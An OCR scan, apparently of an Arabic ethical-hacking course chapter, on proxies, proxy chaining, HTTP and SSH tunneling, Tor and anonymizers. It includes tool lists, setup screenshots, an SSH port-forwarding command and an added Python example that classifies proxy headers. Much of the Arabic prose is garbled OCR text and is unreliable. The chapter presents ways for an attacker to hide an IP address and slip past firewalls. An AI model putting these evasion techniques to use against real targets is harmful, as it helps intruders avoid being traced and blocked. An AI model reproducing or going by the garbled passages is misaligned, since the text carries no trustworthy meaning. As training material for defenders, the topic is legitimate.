DNS, SNMP, NETBIOS, IP lW^ Device Name Preference J^l jL^I o 
i^)3l <jujLaJ! ^tjUll jj^-^ ^ ^jUtj ^ jlja Discover 1 Sail 1 ^ j£j ^l^ijVI ^su o 







: ^Vl£ cjljUkJI t> j^l 4^ -oli Local Jc Ia^JL -5 







[Screenshot: The Dude main window after discovery, with the Preferences, Local Server, Help, Settings, Discover and Tools controls and the Local server map selected]

NETWORK DISCOVERY AND MAPPING TOOLS 

D^-^-V! CjI£1^jj( c ftjjj£ f^lc tiliC-LmJ Igil .<iL <j^LkJl <JL^jV! A^juJ 4_IaJ^Jl (jla^su (ill ^ajujJ 4£jjuo]| iajl^k ^jojJJ L_flLaLi£l dllj^l 

: JL^iV! UUo aJc£\ cjIj/VI 
LANState available at http://www.10-strike.com

IPsonar available at http://www.lumeta.com

CartoReso available at http://cartoreso.campus.ecp.fr

Switch Center Enterprise available at http://www.lan-secure.com

HP Network Node Manager i Software available at http://www8.hp.com

NetMapper available at http://www.opnet.com

NetBrain Enterprise Suite available at http://www.netbraintech.com

Spiceworks-Network Mapper available at http://www.spiceworks.com

NetCrunch available at http://www.adremsoft.com



3.7 PREPARE PROXY



\ a A A ^jj i *aj<j ^joi^j^JI/^^^ j]| A-iaj£ ajudflll I^A 1 * a - ,^JJ^A t . il^j Liajlj .liLa j^Ij^q Jl <J jj^ jll (jja^l g Jl 1 g ^ Iklujj 

What is a PROXY?

^ill laJ > o jll Liajl J ^ J > ^ I— ^^^J^ J> 1 > ^ ^ uJ> lS^-JI [tg-Lo 4_lJ^sJl ^5^-*-* Jl ^.JJJ PrOXy 4-J^ 

^ixJj ^jjjalla a (jjjitL ^jlj laJL (jjj^a^jui ^JJJ l^jjuiLixi I jl ^.^)JJ c£^l ^^)1LJI 1 - taJ) (^^-i*^ 4_}jjuiJ (jx» -^^J-^ 

m (J jjjoiJI j <JjLuJ! (jll UaJjoj j (jj^J jJJj£juJl jl ( . 1^1 -\\\ Liajl 

^Jlsu a£jjoJ! IIluj ^jjj ^31 4_ilkUI ^c^l^JI cA Ala ^g^ijj laj > o jll £cxAi^)i3! Jc (3^^ Proxy -Jl u!^ ^-?^^>^ J *<^J^I 

<Jjjj 4_ilc JjAxjII ^JalaiJ 4£jjual3 tJla 4_ILujjI JL^. Jj .^iJl jl *^)3l (j^^a (jC ^kl lijj^aJ t flj - gaJJ ^al 4£jjual3 lfrfr^.jJ (_£JJJ CAJUl 
J ^^ijalJj .(_£^)^.l <9J^)iaJ ^)Jl ^JaluJj jl JkUl £C-<ili^)il3 <J^lcl <Jjfj ^)3l Jc JjAxjll ^ 1 kLj ^ c _ 5 joJI (JJ^J .^^i J^^^J ^J^Jjl 

t^jia ^ a£jJo3U JL^ajl ^jUr> ^li ^UlUj ,Lo f-^g^ t ; ill laj L-flj > ^alj V j CjUi^k <jV .Proxy Server ^ LSaJI 

Why use a PROXY SERVER?

-C5 ^jUJI J jj^a jll tiL 3^UJI aJ^JI a£jj^13 sbt£ ^^juoS jjJI J^"..n dii^ <.4Jj**. jl^ Ja£Lumj -1 
JL^iVI jjj^II Sj^i c> ^UuJl C;r ^jjJI ^l^au^l <j| tip address multiplexer <i J^*^ -2 



(anonymous surfing) cr^l -3 

<j* cjVL^V! j cj^j La 11a j ^ jSa Jl Ajjj^aj I^js j jj^aUl t (f iltration) A^LaaII -4 

^ ga^Lo ^^joi^j^J ^a^l j^. ~\ laJLujI ;^ "<AjujLLq J;1C." ^1 ^Jl jl djU!)lcyi ^1 J-J^J ^^^V^ 

.Bandwidth -S^aJ -6 



How a PROXY SERVER works

^lla ^1 tiL (j-aUJl uJlflJl J^JJ V jl t(4jaij^JI o^J lillLJI) C5 lxi3l ^UJI/^UI ^ S-lJj <^ij^a L-J1J ^^ju^jjJI ^l^klujl Alo 
[Figure: the Attacker reaches the Target Organization through a Proxy Server]
(mask his IP address) <i IP u'j^ u\* 'l^jji %icL** ^ j^JI ^ <tal ^1 <>- < 





^ Wq^l ^jl jixl\ V-jj i>5 jai£jji3l ^j-<i ^a&j j>i^o ^jl jjc ^ 4_i^jja3l ^^Lkil (log file) l!^ ' ^taLo laj ^x^l^JI -1 
<J jl! ^ j.^>.q^ jjc. s^lc (Jj^j C5^^J (remotely) c5^>^^^ j - ^^ ^j^ j^j ^l^WI a£jjoJI ^1 J jll 

USE OF PROXIES FOR ATTACK

C;? ijLJI IP jIjjc pU^j ^ J^xj (Anonymous proxies) Jj^J^ c^jj^ . W) Jj^j^^ ^^AjjA] j±£ ^ 

: (Anonymous proxies) Jj^J^ yr^jj^ c> .U^j^ ^ v^ni^ t ^JL ^S\jA\ ^> (CjUjixJI U j^j) 

cjI^JI ^ U j^j (Non-Anonymous proxies) ^^jj^^ ^1 aJLjU! (jAh l^mj jl^j 

. (web-based anonymizers)M^ 

_4_j ^aL^Jl j^j^aII IP (j! jjc. J j^. CjUi jlx-d cJ^^ ^^LkJ3 J^juJI djliLo q\ Lo£ ^fiiH ^jia^suj 
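The distinction drawn above, between a non-anonymous proxy that passes the client's address along and an anonymous one that hides it, is visible to the defender in the request headers. The following is an added illustration (not code from the page) of how a web server's logging layer can classify an incoming request by those headers; the header names used (Via, X-Forwarded-For, Forwarded, X-Real-IP) are the standard ones, and the three sample requests are constructed.

```python
import re

# Added example: classify an HTTP request by the proxy headers it carries and
# keep both the peer address and any disclosed client address in the log.
# The sample requests at the bottom are constructed for this illustration.

DISCLOSING = ("x-forwarded-for", "forwarded", "x-real-ip")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, {header: value}).

    Header names are lower-cased; a repeated header keeps its last value."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def disclosed_client(headers):
    """Client address a proxy disclosed, or None if no header carries one."""
    if "x-forwarded-for" in headers:
        # left-most entry is the original client; later ones are proxies en route
        return headers["x-forwarded-for"].split(",")[0].strip()
    if "forwarded" in headers:          # RFC 7239 form: for=1.2.3.4 or for="[::1]"
        m = re.search(r'for="?\[?([0-9A-Fa-f.:]+)', headers["forwarded"])
        if m:
            return m.group(1)
    if "x-real-ip" in headers:
        return headers["x-real-ip"]
    return None


def classify(peer_ip, raw):
    """Return (kind, client_ip) for a request that arrived from peer_ip.

    'direct'        no proxy header at all; peer_ip is the client.  A proxy
                    that strips every header also lands here, so the peer
                    should still be checked against known-proxy lists.
    'non-anonymous' a proxy disclosed the real client address
    'anonymous'     a proxy announced itself (Via) but hid the client"""
    _, headers = parse_request(raw)
    client = disclosed_client(headers)
    if client:
        return "non-anonymous", client
    if "via" in headers:
        return "anonymous", None
    return "direct", peer_ip


def log_line(peer_ip, raw):
    """One access-log style line that records peer and disclosed client."""
    request_line, _ = parse_request(raw)
    kind, client = classify(peer_ip, raw)
    return "%s peer=%s client=%s %s" % (kind, peer_ip, client or "-", request_line)


# Constructed samples: the same GET arriving three different ways.
DIRECT = "GET / HTTP/1.1\r\nHost: example.org\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
VIA_NONANON = ("GET / HTTP/1.1\r\nHost: example.org\r\n"
               "Via: 1.1 proxy.example.net\r\n"
               "X-Forwarded-For: 203.0.113.7, 198.51.100.9\r\n\r\n")
VIA_ANON = ("GET / HTTP/1.1\r\nHost: example.org\r\n"
            "Via: 1.1 anon.example.net\r\n\r\n")

if __name__ == "__main__":
    for raw in (DIRECT, VIA_NONANON, VIA_ANON):
        print(log_line("198.51.100.9", raw))
```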




[Figure: the Attacker connects directly to the Target]

.ClljjljV! 4SliA ^glc J * ^jj^J ^.1^<JI C5 JaxJjaj li^ .^fiill jia^. 






[Figure: the Attacker connects to the Target through a Logged Proxy]
Using the proxy chaining technique

cj^Jl l-J^J <> ^ISjVl c> ^>^1 f^-^ Ljjl^l j& (proxy chaining technique) 




[Figure, "Using Proxy Chaining": the Attacker's traffic hops through proxies in Mexico, Toronto, Dubai, Israel, the Philippines and London before reaching the Target]



PROXY CHAINING

^U. J j^j o jj^j (proxy serverl) jj^t '(P r <>xy serverl) 1^$^ jj^ J j^I 

. (proxy server2)2 g^jj^ 
11a (^j&j^i ^1 L-ilUl lS-^j^ ^ ^^jjai^ll ^jj^. cjL* jlx-a < ; illall -i^>^ d**^ '(proxy serverl) 1 (^^j^ 
^jj Ajlgill gi clJ^JI ^UJI Jj^j L5 la k J ^kj <(server3) ls^jj* ^ 4-^1 lUjj c> 




[Figure: the User reaches the Web Server through a chain of three proxy servers, each shown with its own IP address and port]

PROXY Tool: PROXY WORKBENCH 



http://proxyworkbench.com
CjVl^ajl iUilU till £c-gjoij t^qjq^ll diajll ^ <!^U> ^ ^1 CjUUJI lP 3 ^ jj^ Proxy Workbench 

.Socket connection-S ^VijVi^fl t ^ J\ o^j&j CjIjUJI j ^jjIj c>a 4 TCP/IP 

.Socket connection ^ cjI^Vi Ail^l cilj^ ^j^j ^jjU Socket connection-S ^InW^ t 

-C5 iiLJl C^jll ^ <J 3^UJI CjUUJI <jV 'U^Vl pi jJaJl J U^J^^ J L^JJ^ .POP3 J HTTPS 

IfrLl^j] A^JjaJl diUi jlst-d ^A^- ^ ^ »QJ ^^ill J cJi^^ ^ q/ii^l ^aUaj JjoU J^Lk ^ CjLa^JI oi^ (Jlxi ^^^ic 6J^IS (jj^J (jl < ; 1> j cJ j3 JUiL< ^ 

.CjKj/MI oa^i ^ij c aj£ ^il Proxy Workbench ^I^IujI 1 > ^jl t*LLaj .^U^aVI jl ^ j^a dj^. jl£ lij U j 

.cIujjjII a-Aaxj ^aLkJI wizard L - J ^f^^ <Aac> l^j -j 
.options j^-^ ^ Tools j ^j^^ <Ajli3l ^1 ^jj^ j^jjli j 4^ c aj^ala ^1 -2 
[Screenshot: Mozilla Firefox (Private Browsing), Tools menu: Downloads (Ctrl+J), Add-ons (Ctrl+Shift+A), Set Up Sync..., Web Developer, Page Info, FlashGot, Options]

3- After clicking Options, the Options window appears. Open the Advanced tab, then the Network tab, and click Settings.



[Screenshot: Firefox Options window, Advanced > Network tab: Connection ("Configure how Firefox connects to the Internet", Settings... button); Cached Web Content ("Your web content cache is currently using 252 MB of disk space", Override automatic cache management, Limit cache to 350 MB of space, Clear Now); Offline Web Content and User Data ("Your application cache is currently using 0 bytes of disk space", Tell me when a website asks to store data for offline use)]

4- Clicking Settings opens the Connection Settings window. Select Manual proxy configuration, enter 127.0.0.1 as the HTTP Proxy and 8080 as the port, tick Use this proxy server for all protocols, then click OK.



[Screenshot: Connection Settings, "Configure Proxies to Access the Internet". Options: No proxy; Auto-detect proxy settings for this network; Use system proxy settings; Manual proxy configuration (selected): HTTP Proxy 127.0.0.1, Port 8080; "Use this proxy server for all protocols" ticked, so SSL Proxy, FTP Proxy and SOCKS Host are also 127.0.0.1 port 8080 (SOCKS v4); No Proxy for: localhost, 127.0.0.1 (Example: .mozilla.org, .net.nz, 192.168.1.0/24); Automatic proxy configuration URL. Buttons: Help, OK]

;<JU3I 4JL&\ <jc s j^Jl ^ -ki^jall (jjjia proxy Workbench ci^ 3 ^ J^-^ ^ -5 
[Screenshot: Proxy Workbench (menus File, View, Tools, Help), Monitoring: JANA-TEBA. Listeners: SMTP - Outgoing e-mail (25); POP3 - Incoming e-mail (110); HTTP Proxy - Web (8080); HTTPS Proxy - Secure Web (443) - Not Listening; FTP - File Transfer Protocol (21) - Not Listening; Pass Through - For Testing Apps (1000) - Not Listening. "Details for All Activity" lists connections from 127.0.0.1 (ports 4727, 4729, 4731, 4734, 4736, ...) to 69.171.248.16:443, protocol HTTP, started 02:29:46 to 02:29:49. "Real time data for All Activity" shows the hex and ASCII dump of a captured HTTP request whose headers include a User-Agent of Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0, Proxy-Connection: keep-alive, Connection: keep-alive and Host: 5-p-06-frc1.channel.facebook.com. Status bar: Memory 8 KBytes, Sockets 20, Events 160]


6- Open the port configuration from the Tools menu by clicking Configuration ports.

7- In the window that appears, select HTTP Proxy - Web 8080 from the list of ports and click Configure HTTP for port 8080 to configure that listener.






[Screenshot: Configure Proxy Workbench, Proxy Ports. Ports to listen on (Port / Description): 25 SMTP - Outgoing e-mail; 110 POP3 - Incoming e-mail; 8080 HTTP Proxy - Web; 443 HTTPS Proxy - Secure Web; 21 FTP - File Transfer Protocol; 1000 Pass Through - For Testing Apps. Protocol assigned to port 8080: <Don't use>, Pass Through, HTTPS, POP3, FTP. Buttons: Add..., Delete, Configure HTTP for port 8080..., Show this screen at startup, Close]



JttJ HTTP Proprieties u> ^ Configure HTTP for port 8080 c> ^ -8 

OK k» > ^ ^ gr ^£ J jAj ^UJI IP jIjjc <J JjUuII ^j^JI y-i Connect via another proxy 



[Screenshot: HTTP Properties dialog, General tab: "On the web server, connect to port: 80" or "Connect via another proxy" with Proxy server: 192.168.16.70, Port: 8080]
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. (proxy chaining) (!? ^jjJl JjoA^ ? l.ikiJ ^ <ihe.Lou sbVl oi* -10 



PROXY TOOL: PROXIFIER 



http://www.proxifier.com
^ jji HTTPS J SOCKS d~5 ^ jjJI J^k <> lUII V <^ll te*S3\ ^linkil ^ Proxifier 



.ciL o^UJ! IP ^c ^ -2 

.4 alia a CjV jJj^)J a I iklLujl J ^^joi^j^J! t - il /ol ^ ^j^j <LuJjoj (J-a*J q\ (j^J ~3 

,(J jll CjUII ^Ij 4_jjU3! ^jljA^JI jjLaaj till ^ajujj -4 



[Screenshot: Proxifier main window (File Profile Log View Help). Connections pane with columns Application, Target, Time/Status, Rule : Proxy, Bytes Sent, Bytes Received; rows for devenv.exe (blogs.msdn.com:80), iexplore.exe (www.proxifier.com:80) and svchost.exe (System) *64 (www.update.microso...), all matched by rule Default and routed through proxy 192.168.1.1:1080 SOCKS5. Log pane with entries such as "[05.04 21:14:42] iexplore.exe - www.proxifier.com:80 close. 442 bytes sent. 292 bytes received, lifetime 00:05" and "[05.04 21:15:11] svchost.exe (System) *64 - download.windowsupdate.com:80 open through proxy 192.168.1.1:1080 SOCKS5". Status bar: Ready, 6 active connections, Down 0 B/sec, Up 250 B/sec, System DNS]



PROXY TOOL: PROXY SWITCHER 

http://www.proxyswitcher.com : j^-a^ll
.4? o- 3 ^ IP u'j^ df- uj^ ^j^Vi a^ (anonymous surfing) ^i^db t*U Proxy Switcher 

.t*L IP jljj^ ^.ikj 
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„aj wizard ^iLc i> Proxy Switcher ^ -1 

options ^ Tools j ^j^*-^ <-ajtSIt ^1 j^j^-s o-y j 4^ c a^ala ^1 L-i&ij -2 




[Screenshot: Mozilla Firefox private browsing window with the Tools menu open: Downloads Ctrl+J, Add-ons Ctrl+Shift+A, Set Up Sync..., Web Developer, Page Info, FlashGot, Options]



j! jUaJI j^-^ Advanced ^ > ^jk-^ ^Ull jI^Ij ^aJUII ^Uill j^-ki Options ^ -3 

.Setting ^ Network ^ ^ j^-^ cjIc a c _ 5 ic- ^jii^j <j| 6<J 4_LtLJI 



[Screenshot: Firefox Options dialog (Tabs, Content, Applications, Privacy, Security, Sync, Advanced), Advanced > Network tab: Connection ("Configure how Firefox connects to the Internet", Settings... button); Cached Web Content (252 MB of disk space in use, "Override automatic cache management", "Limit cache to 350 MB of space", Clear Now); Offline Web Content and User Data (0 bytes in use, "Tell me when a website asks to store data for offline use", Exceptions..., Remove...)]



.Use system Proxy setting V* .Connection setting u'j^' ^ 4JL&\ j^ks Setting 1» > **l t -4 

Ok J-i^ fS 



[Screenshot: Connection Settings dialog, "Configure Proxies to Access the Internet": No proxy / Auto-detect proxy settings for this network / Use system proxy settings / Manual proxy configuration. Manual settings shown: HTTP Proxy 127.0.0.1 Port 8080, "Use this proxy server for all protocols" checked (SSL Proxy, FTP Proxy and SOCKS Host 127.0.0.1; SOCKS v4 / SOCKS v5); No Proxy for: localhost, 127.0.0.1 (Example: .mozilla.org, .net.nz, 192.168.1.0/24); Automatic proxy configuration URL]



i^VtSproxy list wizard jj^ 1 ^ ^ * 4->jIjVI W^r^W Jjjla cp> (j fojWfl l J^i? ^ ji> -5 
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Proxy List Wizard 




[Screenshot: Proxy List Wizard, "Welcome to the Proxy Switcher": "Using this wizard you can quickly complete common proxy list management tasks. To continue, click Next." Checkbox "Show Wizard on Startup"; Cancel]



.Finish k» > ^ .Find New Server, Rescan Servers, Recheck Dead ^Uill -6 




[Screenshot: Proxy List Wizard, Common Tasks: "Find New Servers, Rescan Servers, Recheck Dead" with the options "Find All New Proxy Servers", "Find New Proxy Servers Located in a Specific Country" and "Rescan Working and Anonymous Proxy Servers"; "Click Finish to continue."; checkbox "Show Wizard on Startup"; < Back, Cancel]



cjU^jjJI jj^-k ^^jj lJj^ ^illj jjJaSlI <> j^y\ l_l>UJI ^ ^jJI Basic Anonymity -ki-^L ^ 

:c5 jV1£ ^ lU^ 



[Screenshot: Proxy Switcher Unregistered (Direct Connection) main window (File Edit Actions View Help). Left pane "Filter Proxy Servers": Proxy Scanner, New (2939), High Anonymous (0), SSL (0), Elite (0), Dead (1105), Permanently (31), Basic Anonymity (43), Private (1), Dangerous (76), My Proxy Servers (0), ProxySwitcher (0). Right pane lists servers (host:port) with State (Alive or Alive-SSL), Response (11317ms to 17370ms) and Country (Germany, Czech Republic, Romania, Russian Federation, Turkey, Serbia and Montenegro, France). Scanner log: "54.234.196.23:3030 tested as [Dead] because this is not a valid HTTP or SOCKS server", "66.34.39.33:19736 tested as [Private]". Bottom bar: Disabled, Keep Alive, Auto Switch, (0) Idle]

-9 
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.t^iki^j ^1 ip CjUUj Aijx^l http://www.proxyswitcher.com/check.php s-yjll SjLjj -10 




[Screenshot: result page: "Your possible IP address is: 41.67.68.133", Location: Unknown, Proxy Server: DETECTED, Proxy IP: 54.84.255.49, Proxy Country: UNITED STATES]



jrl jJl (j^jla Cfi> ^Ui <^^oj Proxy Switcher £>* 0' cr^JJ^ ^1^2*^1 ^ <j#^ ^ ;4iajal4 

.[localhost:3128] 4-tlJiiyil JljaM J^kilt J cjUUJ) 



PROXY TOOL: SOCKSCHAIN 



http://ufasoft.com : j^-a^ll

jl jj& HTTP proxy ji Socks c> J^Lk £u jjj) ^\ ^ JaxJU t*B ^ill jj SocksChain 
<J ikU jSaj mL ^£jjA\/c.y& jl! <> J^Lk t> cjljl.nq-i.nVI ^1 SOCKS ^ uj£ V^J .^V'^ 1 IP 
J) ^ j 'IRC 'HTTP 'TELNET JS* 'TCP-connection ^Wo^j SOCKS JAwj* ^ V ^ g-l j* 



[Screenshot: Ufasoft SocksChain window (File View Tools Help) showing, per process (chrome, iexplore, PING), chains of the form "Through <proxy id> To <host>:80 N connections", for example "To www.certifiedhacker.com[...]:80 6 connections", and a warning line beginning "DANGEROUS SOCKS PROTOCOL SOCKS4 ADDRESS ..."; http://ufasoft.com]
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PROXY TOOL: TOR (THE ONION ROUTING) 



https://www.torproject.org : j^-a-JI

^jjj L_istj^all ^j-d (J»^J Tor (j-al^Jl <£jjuoll (Jjjjaixi ^Jajujl £§1 



^l*Jl ^-UixJl JJQ ujJ ^1 ^^J j CjUUJI ^3^" &^)^> 

*UjI ^i*^ ^ (proxy router) cs^jj^ uJ^ 
. JISSjVI jl^ "jjj J^" initiating onion router 



j go in u - j jj^- 



&JxL^ Ol S J CjLeUfc ftJ.iU lA>& J-ij^' '-ii*, 



[Screenshot: Tor Browser (Windows-3.5.3) with bookmarks toolbar: SquirrelMail 1.4.23 [SVN], The Hidden Wiki, The Tor version of Fac..., TORCH: Tor Search!, The Tor Blog, "Learn more about Tor &", Search DuckDuckGo; Startpage; footer noting the Tor Project's US 501(c)(3) status]

_ c/^y ^» -r- ^JSuJLi i—ij ^jUy/ H^Tii* ^Jj^aj ^3 ^j^. tj^fi i—iif



OTHER PROXY TOOLS

I JIjSI ^^lll ls^ 0 sj ^* ♦ 

Burp Suite available at http://www.portswigger.net

Proxy Tool Windows App available at http://webproxylist.com
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Fiddler available at http://www.fiddler2.com

Proxy available at http://www.analogx.com

Protoport Proxy Chain available at http://www.protoport.com

Proxy+ available at http://www.proxyplus.cz

FastProxySwitch available at http://affinity-tools.com

ezProxy available at http://www.oclc.org/en-europe/ezproxy.html

JAP Anonymity and Privacy available at http://anon.inf.tu-dresden.de/index_en.html

CC Proxy Server available at http://www.youngzsoft.net

Socks Proxy Scanner available at http://www.mylanviewer.com

Charles available at http://www.charlesproxy.com

UltraSurf available at http://www.ultrasurf.us

WideCap available at http://widecap.ru

ProxyCap available at http://www.proxycap.com






FREE PROXY SERVERS 

t*S {Free proxy servers} 4-^' o- 3 ^ IP u'j^- CP ( uj^ * j j^ ^ J] Jj^jJl yi citacl^ 



HTTP TUNNELING TECHNIQUES 



<J j£ jjj^>j .ajLa^J! q\ l^jja^)ij ^^jII j j$a\\ ^-^j-^V^ } ^ ^■-■tu.nj l_j jLojI HTTP Tunneling 

XL** j^k; .HTTP Tunneling ^ HTTP Tunneling^W^ ?^-! .JL-ftl cj| jSl J^j HTTP 
j.Lijb ^jL 2^UjJI li& .HTTP Jj^jjjjj J^k <> JU^j!iU ^-iki^ (client-server-based application) <=H*JI-Jaa*1I 

j HTTP fit* J] POST JL-jj J* tfj^i m j^Vl liA .^uj\ ^ jjj jLik r I^Uj <ouW oh HTTP Jii 
^ia^. .<_£^>^.VI ^ cJj^^ ^Uaill C5 Jc 4i±L<JI HTTP Tunneling ^j. 1 cJ^ 1 *-^ oj. ^ f laJLujj ^.l^JI .^j^^ll 

.HTTP JAwjj i> HTTP Tunneling t> ^J^» ^W*^ 




[Figure: HTTP tunneling overview. End users use HTTP-Tunnel to transmit or receive data through the firewall; the traffic passes an HTTP proxy or firewall to racks of HTTP Tunnel servers, which receive and relay the data to previously inaccessible servers and services.]



a ^nuJ j l^jjliu ^jj ^^jll ^ alia &1I <£jjoJI cjV jjj^>j ^ i^LujI ; JU^jVI ^jUr. ^jj <L^)Ja ^jc <^^j s- 1 ji^' ^HTTP Tunnel 

.CjV j£ JJjjJ! (> TCP / IP ^ LS* CjVj^JJ JJJJ ^HTTP J>jjjjj 
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: Jl* jUg^jt *<+2A\ ^ HTTP Tunneling gjj^j A 



jj^i ^1 j jUVl ^i- 6 ^Li jjSj ^1 ^il^ ^> JL^j^U aIloj j£ cjU^Vl ^ HTTP Tunneling ^ 

CliVU^ajVl (j-a L_fljj]a3l £>i& <Jla ^ Jj^al jlill J^^J ClAlnlajli £a b3lc.j ^(^ju^jjj ^1 j^. jl 6<jjU3I (jlj^aJl 'NATS t 




?HTTp Tunne ii ng j\ P uJ ijuj 



Ajjill ^ m ^ ial_L<J aj^a^. l!^ ajL^JI jl^a. ^ jj5 j j ^ ^c. jll ^^ic dijjljVl ^l^klajU till ^jujj HTTP Tunneling 

J j£ jii JL^aiil JUiijj (Jjjia (jc- cg-^ ( . ^* *^ ^-^-^j HTTP Tunneling Jj^jj jjj CjVU^ajl 

. HTTPJ jjj c> 

<al «s a ^aJJ jl ^j-Q XP 3^" *^^) ^">(S & 



FTP ^l^luit ^jjj j ^443/80 ialall iaSa ^j^jj ^UJI AjU^JI jl^ ^ iall<JI diulo 3 <Jalo jl 511^ o^aj^j 
^jja j>» HTTP cJ j^j^ ls^^A 3 CP" ^ (j^al^JI cJ^j) tAiLaJI .CijjljVl a£jjoi ^^ic ^isu ^Iaj (JL^j^l! 



[Figure: FTP over an HTTP tunnel. Inside the network: FTP client software talks to an HTTP tunneling client running on a local port; the FTP data is encapsulated in an HTTP packet and sent via HTTP. The firewall rules only allow ports 80 and 443 (ports 23, 21, 79, 25, 110, 500 and 69 are also listed). Outside the network: HTTP tunneling server software unwraps the FTP data and delivers it to the remote server running FTP.]
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HTTP Tunneling Tool: Super Network Tunnel 



http://www.networktunnel.net



jjuks j HTTP Tunneling c-U^ HTTP Tunneling Super Network Tunnel 

jl jj^ ^ j^V 1 4> ^1 jJI <J\ Jj^ j3U t*U ^1 <iJ VPN .^UJ3 HTTP Tunneling 

AA a^W jl^ (fii 



[Screenshot: Super Network Tunnel Client window: Add, Connect, Help, About; program list (port mode, exclude running programs); server and client connection counts, "My Local IP", server total threads (including cache); "Use Real / Remote DNS" options; "View System Today Log"; note that the client supports both 32-bit and 64-bit; http://www.networktunnel.net]



HTTP Tunneling Tool: HTTP-Tunnel 



http://www.http-tunnel.com



<y*] ^Ujj t*Ui .ajL^JI j!^ ^ JjUj J^U <> £±>j±>)[\ Jl\ Jj^jII t*U ^ib t SOCKS<^£ lUs HTTP Tunnel 

'SOCKS ^i->^a JJ t ' a J^' ; .: (J-aUJl ^Uail! 4j1c; ^ .CjUUJI ^ w " jj£ Jli till ^iL -UV <J-aUJl ^Uaill ^JJJJ 



[Figure: HTTP-Tunnel topology: end user with HTTP-tunnel -> HTTP proxy or firewall -> Internet -> HTTP proxy or firewall -> HTTP-Tunnel servers]
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HTTP Tunneling Tool: HTTPort 



http://www.targeted.org/htthost



j\ j jJI {2L J^Lk (transparent tunnel)^!^ lU^ ls'^ j HTTHost i> ^ j* HTTPort 

jj < flllk^ ^l^kl^l c^jSaj HTTPort J^V 1 c> ^ j^h ls^j 'HTTP g^jjJI ^iU jjUi cSU HTTPort 

'IRC 'FTP ' jW^ 'ICQ 'P2P ^AiLlI lWjj ^1 jj ^jjjSIVI jljjJI . i^AjjA\ <> c^j jay I 

SSH TUNNELING 



C5 ic til^cLoaj .ajIa^JI ci^ ^ ^ jj^l ^ jjW^ <Jii cl£^ 4-1 SSH tunneling 



aLjojj jilsu <u! dii^ 6 [real IP]<^-*^ IP u' ^ <-<^U3! J^UUI *^f" ciUijSSH tunnel i^U C5 ic^ c_Ak3l ji& 

SSH tunnel j^j^ ^ tillil .uj^>^ 6 ^ > ^> 4-1 > >ij ^ u <^>j <jl (j^-ajj 64_l<JIslII dijjljyi a£jjui ^^ic (j >*>i <Jja l^Jc ^ j^^l 
^ jW J) jW ^j^' ^ c> ^£ -^u SSH tunnel IP u'j^ W^jd yr^ JSl^l lUJ 
^^iJI ^LauV JJj ~ iklujj <j| <iL <j^LkJI cjUUJI jj° ujj ^jj tillil 4 6^)ijaui SSH tunnel . > » j j^-^ cJ^-k 

:< yt ^JiUI Aj^I! dVVI .cjVI ^!s»j Las'! >-Jkuj V- 1 — ' ^1 ^ ^ lP! ^ SSH tunnel ^I^V 

.^Ltft jajn ^fc (SSH tunnel) ^ f lAJ) 
IP jk. ^ l^jll JU^I Jj ,^3! JU^I t> SSH Jl— 31 ^ - 

.port forwarding j> port acceleration ^ .o- 3 ^ O'j^ JU^^ ^^^j ^ 
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port forwarding &jIj^Ij jjxjII jlg^JI JL^aj^U <ul >ikU jjjj ^ill JxnWfl l jj^J 4 C5 1^JI jl^JI 

j <j^aLai) jjq uHll ^iSli-a SSH ^'^*1>»J 'jfi jJJ^ll ^jjjj <JL^jVI (j-i^Lil 



[Figure: SSH tunneling. On the attacker's side a mail client, app client, web client and SSH client; across the Internet, through perimeter controls on both sides, to an SSH server that forwards to the DB server, mail server, TCP server, web server and app server.]



SSH TUNNELING TOOL: OPENSSH 



http://www.openssh.org j^**lt



.CjIa^JI Ia jjc.j Jlxi j^j ^glc* dk^lill ^^ic ^Ljakll t - ii ^Ui ^ jjj - *^ ^^>^ £j A0 > ^j^OpenSSH 

(jnWfll 11a .aA c_jLai^ tiL^ uj^ yr^ Jl ^U^l jl$aJI ij^. a^j^J cjaj *L&y <uhviml o^OpenSSH 

;^JU3| j <Jt-Laj!i3l ^Jfl (j^^a *Lal>IaJ ml ^aJJ 



# ssh user@certifiedhacker.com -L 2000:certifiedhacker.com:25 -N



aJI J ^ ill ^^UJI j <xJ user @ certifieclhacker.com 

axj iiiJl ;< LuiaJ I iyi^ll iaiJ! [-L 2000:certifiedhacker.com:25] 

.^ull e U^I j^ljVl iiii ^ V ^ [-N] 

s jiAJI certifiedhacker.com ^ 25 ^iJI 2000 c^^^ c> f J^' 5^ ^ ^ 
SSH TUNNELING TOOL: BITVISE 

http://www.bitvise.com : j^-^ll

.SSH Tunnel I^^Luj [client server-based application] SSH j ^SL J£ j* Bitvise 

ijf. jjAijjll ^^1 ojb] aj ^Bitvise o.-- ■ jj^j^^ (*^^ j^-j J-^l ^ J j^-^ aaLi^u Cjlj^a ^ILJI till j^jj 

jjq ujj ^^ic 6 j jSII ajj] Bitvise 

a' cr 131 ^ j 'FTP-to-SFTP <SFTP j-l jVl jk^ ^j tSlliSj a^j^j ^ SSH Bitvise c>^ 

s jbVI j Port Forwarding ^ uj^ 5 
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[Screenshot: Bitvise SSH Client SFTP window (Login, Options, Remote Desktop, Terminal, SFTP tabs; Upload Queue, Download Queue, Log) with local and remote file panes listing files by Name, Size, Type (Application, TDS File), Date Modified (2006-12-26) and Attributes; http://www.bitvise.com]



ANONYMIZERS

^Uaill (j-<» (ip (jl j^-) S^j*^^ djUi jlx-<JI ^ia^. ^Jl jj ^^ic cJaxj An Anonymizcr . a ^ (j^aL^JI ^i^i <J*^ 

t (HTTPi)^f*^^ f>g Anonymizer ^ .^4^ j^a^JI ^jUuia ^UlUj 4 diijjjYl ^i^aii dijl Uiu c^L ^aLklj 

.ciij jjjVI cjU^J ( gopher:) gopher j * (FTP:)^laLJl Jlj J^jjjjj 

^iMI ^ ftjljui^U t^L (j-aLkS! fj^jxiujj^l ajjoljjjII 4 ^ill cili£ ^^-^i 4-j .(Anonymizer field) 
<j\lnkil ^l^V! i-^lS J ^ j^Vl ^ jjJ! cjI jU. j ^Gopher 'FTP < HTTPJ ^l^j J«h ^ ^ Lk£Anon y mizer 

^AlLuaJ) <lSajulj) £JA"\ L. JU3Uj t^^i^jll t_JJ Jl ^5 ^ajail Jl 



^Anonymizer ^« 

; Jj Uua Ajj^JI J^ 

